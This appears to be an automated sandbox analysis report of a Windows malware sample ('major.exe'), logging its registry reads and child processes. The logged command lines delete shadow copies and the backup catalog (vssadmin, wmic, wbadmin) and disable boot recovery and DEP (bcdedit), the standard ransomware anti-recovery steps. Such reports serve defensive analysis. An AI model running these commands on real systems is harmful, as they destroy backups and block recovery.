| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 4, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\WINDOWS\system32\bcdedit.exe | os_pid = 0x46c, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\system32\cmd.exe | base_address = 0x7ff6a7ec0000 |
|
1 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x7ff92fdd0000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\System32\cmd.exe, size = 32743 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetThreadUILanguage, address_out = 0x7ff92fdea990 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CopyFileExW, address_out = 0x7ff92fdee830 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsDebuggerPresent, address_out = 0x7ff92fdee300 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x7ff92f1b0a40 |
|
1 |
Environment (19)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
7 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;C:\Users\FD1HVy\AppData\Local\Microsoft\WindowsApps |
|
2 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\WINDOWS\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\FD1HVy\Desktop |
|
1 | |
| Set Environment String | name = COPYCMD |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000000 |
|
1 | |
| Set Environment String | name = =ExitCodeAscii |
|
1 |
Process #8: cmd.exe
62
0
| Information | Value |
|---|---|
| ID | #8 |
| File Name | c:\windows\system32\cmd.exe |
| Command Line | /C wmic SHADOWCOPY DELETE |
| Initial Working Directory | C:\Users\FD1HVy\Desktop\ |
| Monitor | Start Time: 00:01:25, Reason: Child Process |
| Unmonitor | End Time: 00:01:45, Reason: Self Terminated |
| Monitor Duration | 00:00:19 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x9b0 |
| Parent PID | 0xdc4 (c:\users\fd1hvy\desktop\major.exe) |
| Bitness | 64-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
9FC
0x
F6C
|
Host Behavior
File (15)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Users\FD1HVy\Desktop | type = file_attributes |
|
2 | |
| Open | STD_OUTPUT_HANDLE | - |
|
8 | |
| Open | STD_INPUT_HANDLE | - |
|
5 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 4, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\WINDOWS\System32\Wbem\WMIC.exe | os_pid = 0x738, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\system32\cmd.exe | base_address = 0x7ff6a7ec0000 |
|
1 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x7ff92fdd0000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\System32\cmd.exe, size = 32743 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetThreadUILanguage, address_out = 0x7ff92fdea990 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CopyFileExW, address_out = 0x7ff92fdee830 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsDebuggerPresent, address_out = 0x7ff92fdee300 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x7ff92f1b0a40 |
|
1 |
Environment (19)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
7 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;C:\Users\FD1HVy\AppData\Local\Microsoft\WindowsApps |
|
2 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\WINDOWS\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\FD1HVy\Desktop |
|
1 | |
| Set Environment String | name = COPYCMD |
|
1 | |
| Set Environment String | name = =ExitCode, value = 80041014 |
|
1 | |
| Set Environment String | name = =ExitCodeAscii |
|
1 |
Process #9: wmic.exe
162
0
| Information | Value |
|---|---|
| ID | #9 |
| File Name | c:\windows\system32\wbem\wmic.exe |
| Command Line | wmic SHADOWCOPY DELETE |
| Initial Working Directory | C:\Users\FD1HVy\Desktop\ |
| Monitor | Start Time: 00:01:27, Reason: Child Process |
| Unmonitor | End Time: 00:01:44, Reason: Self Terminated |
| Monitor Duration | 00:00:17 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x738 |
| Parent PID | 0x9b0 (c:\windows\system32\cmd.exe) |
| Bitness | 64-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
F30
0x
260
0x
D70
0x
CEC
0x
E88
0x
1B4
|
Host Behavior
COM (7)
| Operation | Class | Interface | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|---|
| Create | WBEMLocator | IWbemLocator | cls_context = CLSCTX_INPROC_SERVER |
|
1 | |
| Create | F6D90F12-9C73-11D3-B32E-00C04F990BB4 | 2933BF95-7B36-11D2-B20E-00C04F983E60 | cls_context = CLSCTX_INPROC_SERVER |
|
1 | |
| Create | EB87E1BD-3233-11D2-AEC9-00C04FB68820 | EB87E1BC-3233-11D2-AEC9-00C04FB68820 | cls_context = CLSCTX_INPROC_SERVER |
|
1 | |
| Execute | WBEMLocator | IWbemLocator | method_name = ConnectServer, network_resource = root\cli |
|
1 | |
| Execute | WBEMLocator | IWbemLocator | method_name = ConnectServer, network_resource = root\cli\ms_409 |
|
1 | |
| Execute | WBEMLocator | IWbemLocator | method_name = ConnectServer, network_resource = \\NQDPDE\ROOT\CIMV2 |
|
1 | |
| Execute | WBEMLocator | IWbemServices | method_name = ExecQuery, query_language = WQL, query = SELECT * FROM Win32_ShadowCopy |
|
1 |
Registry (5)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM | value_name = Logging, data = 48 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM | value_name = Logging Directory |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM | value_name = Logging Directory, data = 37 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM | value_name = Log File Max Size, data = 54 |
|
1 |
Module (1)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\system32\wbem\wmic.exe | base_address = 0x7ff776960000 |
|
1 |
System (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Computer Name | result_out = NQDPDE |
|
1 | |
| Get Time | type = Local Time, time = 2019-05-04 09:14:13 (Local Time) |
|
1 | |
| Get Info | type = System Directory, result_out = C:\WINDOWS\system32 |
|
1 |
Process #10: bcdedit.exe
0
0
| Information | Value |
|---|---|
| ID | #10 |
| File Name | c:\windows\system32\bcdedit.exe |
| Command Line | bcdedit /set {default} recoveryenabled no |
| Initial Working Directory | C:\Users\FD1HVy\Desktop\ |
| Monitor | Start Time: 00:01:28, Reason: Child Process |
| Unmonitor | End Time: 00:01:32, Reason: Self Terminated |
| Monitor Duration | 00:00:03 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x9e4 |
| Parent PID | 0xac8 (c:\windows\system32\cmd.exe) |
| Bitness | 64-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
8AC
0x
E9C
|
Process #11: wbadmin.exe
0
0
| Information | Value |
|---|---|
| ID | #11 |
| File Name | c:\windows\system32\wbadmin.exe |
| Command Line | wbadmin delete catalog -quiet |
| Initial Working Directory | C:\Users\FD1HVy\Desktop\ |
| Monitor | Start Time: 00:01:28, Reason: Child Process |
| Unmonitor | End Time: 00:01:48, Reason: Self Terminated |
| Monitor Duration | 00:00:19 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x7bc |
| Parent PID | 0x37c (c:\windows\system32\cmd.exe) |
| Bitness | 64-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
D34
0x
F04
0x
D38
0x
C04
0x
FD0
|
Process #12: bcdedit.exe
0
0
| Information | Value |
|---|---|
| ID | #12 |
| File Name | c:\windows\system32\bcdedit.exe |
| Command Line | bcdedit.exe /set {current} nx AlwaysOff |
| Initial Working Directory | C:\Users\FD1HVy\Desktop\ |
| Monitor | Start Time: 00:01:28, Reason: Child Process |
| Unmonitor | End Time: 00:01:32, Reason: Self Terminated |
| Monitor Duration | 00:00:03 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x46c |
| Parent PID | 0x8e8 (c:\windows\system32\cmd.exe) |
| Bitness | 64-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
F60
0x
D54
|
Process #13: vssadmin.exe
0
0
| Information | Value |
|---|---|
| ID | #13 |
| File Name | c:\windows\system32\vssadmin.exe |
| Command Line | vssadmin.exe delete shadows /all /quiet |
| Initial Working Directory | C:\Users\FD1HVy\Desktop\ |
| Monitor | Start Time: 00:01:29, Reason: Child Process |
| Unmonitor | End Time: 00:01:34, Reason: Self Terminated |
| Monitor Duration | 00:00:04 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xd4c |
| Parent PID | 0x754 (c:\windows\system32\cmd.exe) |
| Bitness | 64-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
D64
0x
F44
0x
6DC
0x
788
0x
DC0
|
Process #14: bcdedit.exe
0
0
| Information | Value |
|---|---|
| ID | #14 |
| File Name | c:\windows\system32\bcdedit.exe |
| Command Line | bcdedit /set {default} bootstatuspolicy ignoreallfailures |
| Initial Working Directory | C:\Users\FD1HVy\Desktop\ |
| Monitor | Start Time: 00:01:29, Reason: Child Process |
| Unmonitor | End Time: 00:01:32, Reason: Self Terminated |
| Monitor Duration | 00:00:02 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xd74 |
| Parent PID | 0xef8 (c:\windows\system32\cmd.exe) |
| Bitness | 64-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
BE4
0x
EC0
|
